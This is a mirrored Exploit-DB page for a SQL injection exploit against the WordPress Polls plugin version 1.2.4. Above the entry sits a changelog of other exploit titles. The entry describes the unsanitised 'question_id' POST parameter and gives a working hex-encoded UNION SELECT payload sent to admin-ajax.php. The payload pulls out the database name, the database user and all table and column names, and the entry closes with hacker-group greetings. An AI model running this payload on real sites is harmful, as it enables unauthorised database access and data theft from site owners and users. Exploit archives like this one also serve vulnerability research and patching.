bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/remote/44229.txt
Offensive Security ba1d29bdd6 DB: 2018-03-03 
13 changes to exploits/shellcodes

SEGGER embOS/IP FTP Server 3.22 - Denial of Service
DualDesk 20 - 'Proxy.exe' Denial of Service

Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak
Apple iOS - '.pdf' Local Privilege Escalation 'Jailbreak'

Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak
Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow 'Jailbreak'

ASX to MP3 Converter 1.82.50 - '.asx' Local Stack Overflow
ASX to MP3 Converter 1.82.50 (Windows XP SP3) - '.asx' Local Stack Overflow

Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)
Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'namedobj ' Kernel Loader

IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)

IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)

Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)
Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)

ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow

Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak
Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation 'Jailbreak'

Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)
Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' WebKit 5.01 / 'bpf' Kernel Loader 4.55
TestLink Open Source Test Management < 1.9.16 - Remote Code Execution
Joomla! 3.7 - SQL Injection
Posnic Stock Management System - SQL Injection
WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)

WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection
WordPress Plugin UPM Polls 1.0.4 - Blind SQL Injection
D-Link DIR-600M Wireless - Cross-Site Scripting
uWSGI < 2.0.17 - Directory Traversal
2018-03-03 05:01:47 +00:00

38 lines
No EOL
2.3 KiB
Text
Raw Blame History

<b>Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability</b>
<br>
Vulnerable version:<=1.2.4
<br>Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip
////////////////////////
<br>/// Overview:
<br>////////////////////////
<br>
<br>WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file.
////////////////
<br>
/// POC ////
<br>
///////////////
<br>
SQL Injection payload to enumerate tables
<br>----------------------------------------------
<br>http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues
<br><b>Post data</b>
<br>question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5
POC<br>
<img src="https://github.com/incredibleindishell/exploit-code-by-me/blob/master/WordPress%20Polls%20plugin-1.2.4-%20SQL%20Injection%20vulnerability/injected.png?raw=true">
<br>
--==[[ Greetz To ]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
<br>Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
<br>Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
<br>Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
<br>
--==[[ Love To ]]==--
<br>My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
<br>Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
Reference in a new issue View git blame Copy permalink